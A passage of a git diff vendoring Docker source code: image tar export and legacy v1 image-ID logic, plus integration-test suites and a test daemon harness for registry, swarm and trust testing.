reference.WithTag(ref, reference.DefaultTag); err != nil { + return + } + } + + for _, t := range imgDescr[id].refs { + if tagged.String() == t.String() { + return + } + } + imgDescr[id].refs = append(imgDescr[id].refs, tagged) + } + } + + for _, name := range names { + id, ref, err := reference.ParseIDOrReference(name) + if err != nil { + return nil, err + } + if id != "" { + _, err := l.is.Get(image.IDFromDigest(id)) + if err != nil { + return nil, err + } + addAssoc(image.IDFromDigest(id), nil) + continue + } + if ref.Name() == string(digest.Canonical) { + imgID, err := l.is.Search(name) + if err != nil { + return nil, err + } + addAssoc(imgID, nil) + continue + } + if reference.IsNameOnly(ref) { + assocs := l.rs.ReferencesByName(ref) + for _, assoc := range assocs { + addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref) + } + if len(assocs) == 0 { + imgID, err := l.is.Search(name) + if err != nil { + return nil, err + } + addAssoc(imgID, nil) + } + continue + } + id, err = l.rs.Get(ref) + if err != nil { + return nil, err + } + addAssoc(image.IDFromDigest(id), ref) + + } + return imgDescr, nil +} + +func (s *saveSession) save(outStream io.Writer) error { + s.savedLayers = make(map[string]struct{}) + s.diffIDPaths = make(map[layer.DiffID]string) + + // get image json + tempDir, err := ioutil.TempDir("", "docker-export-") + if err != nil { + return err + } + defer os.RemoveAll(tempDir) + + s.outDir = tempDir + reposLegacy := make(map[string]map[string]string) + + var manifest []manifestItem + var parentLinks []parentLink + + for id, imageDescr := range s.images { + foreignSrcs, err := s.saveImage(id) + if err != nil { + return err + } + + var repoTags []string + var layers []string + + for _, ref := range imageDescr.refs { + if _, ok := reposLegacy[ref.Name()]; !ok { + reposLegacy[ref.Name()] = make(map[string]string) + } + reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] + repoTags = append(repoTags, ref.String()) + } + + for _, l := range imageDescr.layers { + layers = append(layers, filepath.Join(l, legacyLayerFileName)) + } + + manifest = append(manifest, manifestItem{ + Config: id.Digest().Hex() + ".json", + RepoTags: repoTags, + Layers: layers, + LayerSources: foreignSrcs, + }) + + parentID, _ := s.is.GetParent(id) + parentLinks = append(parentLinks, parentLink{id, parentID}) + s.tarexporter.loggerImgEvent.LogImageEvent(id.String(), id.String(), "save") + } + + for i, p := range validatedParentLinks(parentLinks) { + if p.parentID != "" { + manifest[i].Parent = p.parentID + } + } + + if len(reposLegacy) > 0 { + reposFile := filepath.Join(tempDir, legacyRepositoriesFileName) + rf, err := os.OpenFile(reposFile, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + return err + } + + if err := json.NewEncoder(rf).Encode(reposLegacy); err != nil { + rf.Close() + return err + } + + rf.Close() + + if err := system.Chtimes(reposFile, time.Unix(0, 0), time.Unix(0, 0)); err != nil { + return err + } + } + + manifestFileName := filepath.Join(tempDir, manifestFileName) + f, err := os.OpenFile(manifestFileName, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + return err + } + + if err := json.NewEncoder(f).Encode(manifest); err != nil { + f.Close() + return err + } + + f.Close() + + if err := system.Chtimes(manifestFileName, time.Unix(0, 0), time.Unix(0, 0)); err != nil { + return err + } + + fs, err := archive.Tar(tempDir, archive.Uncompressed) + if err != nil { + return err + } + defer fs.Close() + + if _, err := io.Copy(outStream, fs); err != nil { + return err + } + return nil +} + +func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) { + img, err := s.is.Get(id) + if err != nil { + return nil, err + } + + if len(img.RootFS.DiffIDs) == 0 { + return nil, fmt.Errorf("empty export - not implemented") + } + + var parent digest.Digest + var layers []string + var foreignSrcs map[layer.DiffID]distribution.Descriptor + for i := range img.RootFS.DiffIDs { + v1Img := image.V1Image{ + Created: img.Created, + } + if i == len(img.RootFS.DiffIDs)-1 { + v1Img = img.V1Image + } + rootFS := *img.RootFS + rootFS.DiffIDs = rootFS.DiffIDs[:i+1] + v1ID, err := v1.CreateID(v1Img, rootFS.ChainID(), parent) + if err != nil { + return nil, err + } + + v1Img.ID = v1ID.Hex() + if parent != "" { + v1Img.Parent = parent.Hex() + } + + src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created) + if err != nil { + return nil, err + } + layers = append(layers, v1Img.ID) + parent = v1ID + if src.Digest != "" { + if foreignSrcs == nil { + foreignSrcs = make(map[layer.DiffID]distribution.Descriptor) + } + foreignSrcs[img.RootFS.DiffIDs[i]] = src + } + } + + configFile := filepath.Join(s.outDir, id.Digest().Hex()+".json") + if err := ioutil.WriteFile(configFile, img.RawJSON(), 0644); err != nil { + return nil, err + } + if err := system.Chtimes(configFile, img.Created, img.Created); err != nil { + return nil, err + } + + s.images[id].layers = layers + return foreignSrcs, nil +} + +func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, createdTime time.Time) (distribution.Descriptor, error) { + if _, exists := s.savedLayers[legacyImg.ID]; exists { + return distribution.Descriptor{}, nil + } + + outDir := filepath.Join(s.outDir, legacyImg.ID) + if err := os.Mkdir(outDir, 0755); err != nil { + return distribution.Descriptor{}, err + } + + // todo: why is this version file here? + if err := ioutil.WriteFile(filepath.Join(outDir, legacyVersionFileName), []byte("1.0"), 0644); err != nil { + return distribution.Descriptor{}, err + } + + imageConfig, err := json.Marshal(legacyImg) + if err != nil { + return distribution.Descriptor{}, err + } + + if err := ioutil.WriteFile(filepath.Join(outDir, legacyConfigFileName), imageConfig, 0644); err != nil { + return distribution.Descriptor{}, err + } + + // serialize filesystem + layerPath := filepath.Join(outDir, legacyLayerFileName) + l, err := s.ls.Get(id) + if err != nil { + return distribution.Descriptor{}, err + } + defer layer.ReleaseAndLog(s.ls, l) + + if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists { + relPath, err := filepath.Rel(outDir, oldPath) + if err != nil { + return distribution.Descriptor{}, err + } + os.Symlink(relPath, layerPath) + } else { + // Use system.CreateSequential rather than os.Create. This ensures sequential + // file access on Windows to avoid eating into MM standby list. + // On Linux, this equates to a regular os.Create. + tarFile, err := system.CreateSequential(layerPath) + if err != nil { + return distribution.Descriptor{}, err + } + defer tarFile.Close() + + arch, err := l.TarStream() + if err != nil { + return distribution.Descriptor{}, err + } + defer arch.Close() + + if _, err := io.Copy(tarFile, arch); err != nil { + return distribution.Descriptor{}, err + } + + for _, fname := range []string{"", legacyVersionFileName, legacyConfigFileName, legacyLayerFileName} { + // todo: maybe save layer created timestamp? + if err := system.Chtimes(filepath.Join(outDir, fname), createdTime, createdTime); err != nil { + return distribution.Descriptor{}, err + } + } + + s.diffIDPaths[l.DiffID()] = layerPath + } + s.savedLayers[legacyImg.ID] = struct{}{} + + var src distribution.Descriptor + if fs, ok := l.(distribution.Describable); ok { + src = fs.Descriptor() + } + return src, nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go new file mode 100644 index 0000000000..c0be95480e --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go @@ -0,0 +1,47 @@ +package tarexport + +import ( + "github.com/docker/distribution" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +const ( + manifestFileName = "manifest.json" + legacyLayerFileName = "layer.tar" + legacyConfigFileName = "json" + legacyVersionFileName = "VERSION" + legacyRepositoriesFileName = "repositories" +) + +type manifestItem struct { + Config string + RepoTags []string + Layers []string + Parent image.ID `json:",omitempty"` + LayerSources map[layer.DiffID]distribution.Descriptor `json:",omitempty"` +} + +type tarexporter struct { + is image.Store + ls layer.Store + rs reference.Store + loggerImgEvent LogImageEvent +} + +// LogImageEvent defines interface for event generation related to image tar(load and save) operations +type LogImageEvent interface { + //LogImageEvent generates an event related to an image operation + LogImageEvent(imageID, refName, action string) +} + +// NewTarExporter returns new ImageExporter for tar packages +func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter { + return &tarexporter{ + is: is, + ls: ls, + rs: rs, + loggerImgEvent: loggerImgEvent, + } +} diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go new file mode 100644 index 0000000000..d498ddbc00 --- /dev/null +++ b/vendor/github.com/docker/docker/image/v1/imagev1.go @@ -0,0 +1,156 @@ +package v1 + +import ( + "encoding/json" + "fmt" + "reflect" + "regexp" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" +) + +var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`) + +// noFallbackMinVersion is the minimum version for which v1compatibility +// information will not be marshaled through the Image struct to remove +// blank fields. +var noFallbackMinVersion = "1.8.3" + +// HistoryFromConfig creates a History struct from v1 configuration JSON +func HistoryFromConfig(imageJSON []byte, emptyLayer bool) (image.History, error) { + h := image.History{} + var v1Image image.V1Image + if err := json.Unmarshal(imageJSON, &v1Image); err != nil { + return h, err + } + + return image.History{ + Author: v1Image.Author, + Created: v1Image.Created, + CreatedBy: strings.Join(v1Image.ContainerConfig.Cmd, " "), + Comment: v1Image.Comment, + EmptyLayer: emptyLayer, + }, nil +} + +// CreateID creates an ID from v1 image, layerID and parent ID. +// Used for backwards compatibility with old clients. +func CreateID(v1Image image.V1Image, layerID layer.ChainID, parent digest.Digest) (digest.Digest, error) { + v1Image.ID = "" + v1JSON, err := json.Marshal(v1Image) + if err != nil { + return "", err + } + + var config map[string]*json.RawMessage + if err := json.Unmarshal(v1JSON, &config); err != nil { + return "", err + } + + // FIXME: note that this is slightly incompatible with RootFS logic + config["layer_id"] = rawJSON(layerID) + if parent != "" { + config["parent"] = rawJSON(parent) + } + + configJSON, err := json.Marshal(config) + if err != nil { + return "", err + } + logrus.Debugf("CreateV1ID %s", configJSON) + + return digest.FromBytes(configJSON), nil +} + +// MakeConfigFromV1Config creates an image config from the legacy V1 config format. +func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []image.History) ([]byte, error) { + var dver struct { + DockerVersion string `json:"docker_version"` + } + + if err := json.Unmarshal(imageJSON, &dver); err != nil { + return nil, err + } + + useFallback := versions.LessThan(dver.DockerVersion, noFallbackMinVersion) + + if useFallback { + var v1Image image.V1Image + err := json.Unmarshal(imageJSON, &v1Image) + if err != nil { + return nil, err + } + imageJSON, err = json.Marshal(v1Image) + if err != nil { + return nil, err + } + } + + var c map[string]*json.RawMessage + if err := json.Unmarshal(imageJSON, &c); err != nil { + return nil, err + } + + delete(c, "id") + delete(c, "parent") + delete(c, "Size") // Size is calculated from data on disk and is inconsistent + delete(c, "parent_id") + delete(c, "layer_id") + delete(c, "throwaway") + + c["rootfs"] = rawJSON(rootfs) + c["history"] = rawJSON(history) + + return json.Marshal(c) +} + +// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct +func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) { + // Top-level v1compatibility string should be a modified version of the + // image config. + var configAsMap map[string]*json.RawMessage + if err := json.Unmarshal(img.RawJSON(), &configAsMap); err != nil { + return nil, err + } + + // Delete fields that didn't exist in old manifest + imageType := reflect.TypeOf(img).Elem() + for i := 0; i < imageType.NumField(); i++ { + f := imageType.Field(i) + jsonName := strings.Split(f.Tag.Get("json"), ",")[0] + // Parent is handled specially below. + if jsonName != "" && jsonName != "parent" { + delete(configAsMap, jsonName) + } + } + configAsMap["id"] = rawJSON(v1ID) + if parentV1ID != "" { + configAsMap["parent"] = rawJSON(parentV1ID) + } + if throwaway { + configAsMap["throwaway"] = rawJSON(true) + } + + return json.Marshal(configAsMap) +} + +func rawJSON(value interface{}) *json.RawMessage { + jsonval, err := json.Marshal(value) + if err != nil { + return nil + } + return (*json.RawMessage)(&jsonval) +} + +// ValidateID checks whether an ID string is a valid image ID. +func ValidateID(id string) error { + if ok := validHex.MatchString(id); !ok { + return fmt.Errorf("image ID %q is invalid", id) + } + return nil +} diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go new file mode 100644 index 0000000000..936c55e4c5 --- /dev/null +++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go @@ -0,0 +1,55 @@ +package v1 + +import ( + "encoding/json" + "testing" + + "github.com/docker/docker/image" +) + +func TestMakeV1ConfigFromConfig(t *testing.T) { + img := &image.Image{ + V1Image: image.V1Image{ + ID: "v2id", + Parent: "v2parent", + OS: "os", + }, + OSVersion: "osversion", + RootFS: &image.RootFS{ + Type: "layers", + }, + } + v2js, err := json.Marshal(img) + if err != nil { + t.Fatal(err) + } + + // Convert the image back in order to get RawJSON() support. + img, err = image.NewFromJSON(v2js) + if err != nil { + t.Fatal(err) + } + + js, err := MakeV1ConfigFromConfig(img, "v1id", "v1parent", false) + if err != nil { + t.Fatal(err) + } + + newimg := &image.Image{} + err = json.Unmarshal(js, newimg) + if err != nil { + t.Fatal(err) + } + + if newimg.V1Image.ID != "v1id" || newimg.Parent != "v1parent" { + t.Error("ids should have changed", newimg.V1Image.ID, newimg.V1Image.Parent) + } + + if newimg.RootFS != nil { + t.Error("rootfs should have been removed") + } + + if newimg.V1Image.OS != "os" { + t.Error("os should have been preserved") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go new file mode 100644 index 0000000000..b87e131b7e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go @@ -0,0 +1,95 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + "sync" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) BenchmarkConcurrentContainerActions(c *check.C) { + maxConcurrency := runtime.GOMAXPROCS(0) + numIterations := c.N + outerGroup := &sync.WaitGroup{} + outerGroup.Add(maxConcurrency) + chErr := make(chan error, numIterations*2*maxConcurrency) + + for i := 0; i < maxConcurrency; i++ { + go func() { + defer outerGroup.Done() + innerGroup := &sync.WaitGroup{} + innerGroup.Add(2) + + go func() { + defer innerGroup.Done() + for i := 0; i < numIterations; i++ { + args := []string{"run", "-d", defaultSleepImage} + args = append(args, sleepCommandForDaemonPlatform()...) + out, _, err := dockerCmdWithError(args...) + if err != nil { + chErr <- fmt.Errorf(out) + return + } + + id := strings.TrimSpace(out) + tmpDir, err := ioutil.TempDir("", "docker-concurrent-test-"+id) + if err != nil { + chErr <- err + return + } + defer os.RemoveAll(tmpDir) + out, _, err = dockerCmdWithError("cp", id+":/tmp", tmpDir) + if err != nil { + chErr <- fmt.Errorf(out) + return + } + + out, _, err = dockerCmdWithError("kill", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + out, _, err = dockerCmdWithError("start", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + out, _, err = dockerCmdWithError("kill", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + // don't do an rm -f here since it can potentially ignore errors from the graphdriver + out, _, err = dockerCmdWithError("rm", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + } + }() + + go func() { + defer innerGroup.Done() + for i := 0; i < numIterations; i++ { + out, _, err := dockerCmdWithError("ps") + if err != nil { + chErr <- fmt.Errorf(out) + } + } + }() + + innerGroup.Wait() + }() + } + + outerGroup.Wait() + close(chErr) + + for err := range chErr { + c.Assert(err, checker.IsNil) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go new file mode 100644 index 0000000000..7084d6f8af --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/check_test.go @@ -0,0 +1,383 @@ +package main + +import ( + "fmt" + "net/http/httptest" + "os" + "path/filepath" + "sync" + "syscall" + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/reexec" + "github.com/go-check/check" +) + +func Test(t *testing.T) { + reexec.Init() // This is required for external graphdriver tests + + if !isLocalDaemon { + fmt.Println("INFO: Testing against a remote daemon") + } else { + fmt.Println("INFO: Testing against a local daemon") + } + + if daemonPlatform == "linux" { + ensureFrozenImagesLinux(t) + } + check.TestingT(t) +} + +func init() { + check.Suite(&DockerSuite{}) +} + +type DockerSuite struct { +} + +func (s *DockerSuite) OnTimeout(c *check.C) { + if daemonPid > 0 && isLocalDaemon { + signalDaemonDump(daemonPid) + } +} + +func (s *DockerSuite) TearDownTest(c *check.C) { + unpauseAllContainers() + deleteAllContainers() + deleteAllImages() + deleteAllVolumes() + deleteAllNetworks() + deleteAllPlugins() +} + +func init() { + check.Suite(&DockerRegistrySuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistrySuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistrySuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerRegistrySuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.reg = setupRegistry(c, false, "", "") + s.d = NewDaemon(c) +} + +func (s *DockerRegistrySuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerSchema1RegistrySuite{ + ds: &DockerSuite{}, + }) +} + +type DockerSchema1RegistrySuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64) + s.reg = setupRegistry(c, true, "", "") + s.d = NewDaemon(c) +} + +func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerRegistryAuthHtpasswdSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistryAuthHtpasswdSuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.reg = setupRegistry(c, false, "htpasswd", "") + s.d = NewDaemon(c) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { + if s.reg != nil { + out, err := s.d.Cmd("logout", privateRegistryURL) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerRegistryAuthTokenSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistryAuthTokenSuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.d = NewDaemon(c) +} + +func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { + if s.reg != nil { + out, err := s.d.Cmd("logout", privateRegistryURL) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C, tokenURL string) { + if s == nil { + c.Fatal("registry suite isn't initialized") + } + s.reg = setupRegistry(c, false, "token", tokenURL) +} + +func init() { + check.Suite(&DockerDaemonSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerDaemonSuite struct { + ds *DockerSuite + d *Daemon +} + +func (s *DockerDaemonSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerDaemonSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d = NewDaemon(c) +} + +func (s *DockerDaemonSuite) TearDownTest(c *check.C) { + testRequires(c, DaemonIsLinux) + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { + filepath.Walk(daemonSockRoot, func(path string, fi os.FileInfo, err error) error { + if err != nil { + // ignore errors here + // not cleaning up sockets is not really an error + return nil + } + if fi.Mode() == os.ModeSocket { + syscall.Unlink(path) + } + return nil + }) + os.RemoveAll(daemonSockRoot) +} + +const defaultSwarmPort = 2477 + +func init() { + check.Suite(&DockerSwarmSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerSwarmSuite struct { + server *httptest.Server + ds *DockerSuite + daemons []*SwarmDaemon + daemonsLock sync.Mutex // protect access to daemons + portIndex int +} + +func (s *DockerSwarmSuite) OnTimeout(c *check.C) { + s.daemonsLock.Lock() + defer s.daemonsLock.Unlock() + for _, d := range s.daemons { + d.DumpStackAndQuit() + } +} + +func (s *DockerSwarmSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux) +} + +func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *SwarmDaemon { + d := &SwarmDaemon{ + Daemon: NewDaemon(c), + port: defaultSwarmPort + s.portIndex, + } + d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port) + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts + if experimentalDaemon { + args = append(args, "--experimental") + } + err := d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + + if joinSwarm == true { + if len(s.daemons) > 0 { + tokens := s.daemons[0].joinTokens(c) + token := tokens.Worker + if manager { + token = tokens.Manager + } + c.Assert(d.Join(swarm.JoinRequest{ + RemoteAddrs: []string{s.daemons[0].listenAddr}, + JoinToken: token, + }), check.IsNil) + } else { + c.Assert(d.Init(swarm.InitRequest{}), check.IsNil) + } + } + + s.portIndex++ + s.daemonsLock.Lock() + s.daemons = append(s.daemons, d) + s.daemonsLock.Unlock() + + return d +} + +func (s *DockerSwarmSuite) TearDownTest(c *check.C) { + testRequires(c, DaemonIsLinux) + s.daemonsLock.Lock() + for _, d := range s.daemons { + d.Stop() + // raft state file is quite big (64MB) so remove it after every test + walDir := filepath.Join(d.root, "swarm/raft/wal") + if err := os.RemoveAll(walDir); err != nil { + c.Logf("error removing %v: %v", walDir, err) + } + + cleanupExecRoot(c, d.execRoot) + } + s.daemons = nil + s.daemonsLock.Unlock() + + s.portIndex = 0 + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerTrustSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerTrustSuite struct { + ds *DockerSuite + reg *testRegistryV2 + not *testNotary +} + +func (s *DockerTrustSuite) SetUpTest(c *check.C) { + testRequires(c, RegistryHosting, NotaryServerHosting) + s.reg = setupRegistry(c, false, "", "") + s.not = setupNotary(c) +} + +func (s *DockerTrustSuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.not != nil { + s.not.Close() + } + + // Remove trusted keys and metadata after test + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + s.ds.TearDownTest(c) +} + +func init() { + ds := &DockerSuite{} + check.Suite(&DockerTrustedSwarmSuite{ + trustSuite: DockerTrustSuite{ + ds: ds, + }, + swarmSuite: DockerSwarmSuite{ + ds: ds, + }, + }) +} + +type DockerTrustedSwarmSuite struct { + swarmSuite DockerSwarmSuite + trustSuite DockerTrustSuite + reg *testRegistryV2 + not *testNotary +} + +func (s *DockerTrustedSwarmSuite) SetUpTest(c *check.C) { + s.swarmSuite.SetUpTest(c) + s.trustSuite.SetUpTest(c) +} + +func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) { + s.trustSuite.TearDownTest(c) + s.swarmSuite.TearDownTest(c) +} + +func (s *DockerTrustedSwarmSuite) OnTimeout(c *check.C) { + s.swarmSuite.OnTimeout(c) +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go new file mode 100644 index 0000000000..9fd3f1e82d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon.go @@ -0,0 +1,608 @@ +package main + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/go-check/check" +) + +var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration") + +// Daemon represents a Docker daemon for the testing framework. +type Daemon struct { + GlobalFlags []string + + id string + c *check.C + logFile *os.File + folder string + root string + stdin io.WriteCloser + stdout, stderr io.ReadCloser + cmd *exec.Cmd + storageDriver string + wait chan error + userlandProxy bool + useDefaultHost bool + useDefaultTLSHost bool + execRoot string +} + +type clientConfig struct { + transport *http.Transport + scheme string + addr string +} + +// NewDaemon returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DEST. +// The daemon will not automatically start. +func NewDaemon(c *check.C) *Daemon { + dest := os.Getenv("DEST") + c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable")) + + err := os.MkdirAll(daemonSockRoot, 0700) + c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root")) + + id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) + dir := filepath.Join(dest, id) + daemonFolder, err := filepath.Abs(dir) + c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir)) + daemonRoot := filepath.Join(daemonFolder, "root") + + c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir)) + + userlandProxy := true + if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { + if val, err := strconv.ParseBool(env); err != nil { + userlandProxy = val + } + } + + return &Daemon{ + id: id, + c: c, + folder: daemonFolder, + root: daemonRoot, + storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"), + userlandProxy: userlandProxy, + execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), + } +} + +// RootDir returns the root directory of the daemon. +func (d *Daemon) RootDir() string { + return d.root +} + +func (d *Daemon) getClientConfig() (*clientConfig, error) { + var ( + transport *http.Transport + scheme string + addr string + proto string + ) + if d.useDefaultTLSHost { + option := &tlsconfig.Options{ + CAFile: "fixtures/https/ca.pem", + CertFile: "fixtures/https/client-cert.pem", + KeyFile: "fixtures/https/client-key.pem", + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + transport = &http.Transport{ + TLSClientConfig: tlsConfig, + } + addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) + scheme = "https" + proto = "tcp" + } else if d.useDefaultHost { + addr = opts.DefaultUnixSocket + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } else { + addr = d.sockPath() + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } + + d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil) + + return &clientConfig{ + transport: transport, + scheme: scheme, + addr: addr, + }, nil +} + +// Start will start the daemon and return once it is ready to receive requests. +// You can specify additional daemon flags. +func (d *Daemon) Start(args ...string) error { + logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder)) + + return d.StartWithLogFile(logFile, args...) +} + +// StartWithLogFile will start the daemon and attach its streams to a given file. +func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { + dockerdBinary, err := exec.LookPath(dockerdBinary) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id)) + + args := append(d.GlobalFlags, + "--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock", + "--graph", d.root, + "--exec-root", d.execRoot, + "--pidfile", fmt.Sprintf("%s/docker.pid", d.folder), + fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), + ) + if experimentalDaemon { + args = append(args, "--experimental", "--init") + } + if !(d.useDefaultHost || d.useDefaultTLSHost) { + args = append(args, []string{"--host", d.sock()}...) + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + args = append(args, []string{"--userns-remap", root}...) + } + + // If we don't explicitly set the log-level or debug flag(-D) then + // turn on debug mode + foundLog := false + foundSd := false + for _, a := range providedArgs { + if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { + foundLog = true + } + if strings.Contains(a, "--storage-driver") { + foundSd = true + } + } + if !foundLog { + args = append(args, "--debug") + } + if d.storageDriver != "" && !foundSd { + args = append(args, "--storage-driver", d.storageDriver) + } + + args = append(args, providedArgs...) + d.cmd = exec.Command(dockerdBinary, args...) + d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") + d.cmd.Stdout = out + d.cmd.Stderr = out + d.logFile = out + + if err := d.cmd.Start(); err != nil { + return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err) + } + + wait := make(chan error) + + go func() { + wait <- d.cmd.Wait() + d.c.Logf("[%s] exiting daemon", d.id) + close(wait) + }() + + d.wait = wait + + tick := time.Tick(500 * time.Millisecond) + // make sure daemon is ready to receive requests + startTime := time.Now().Unix() + for { + 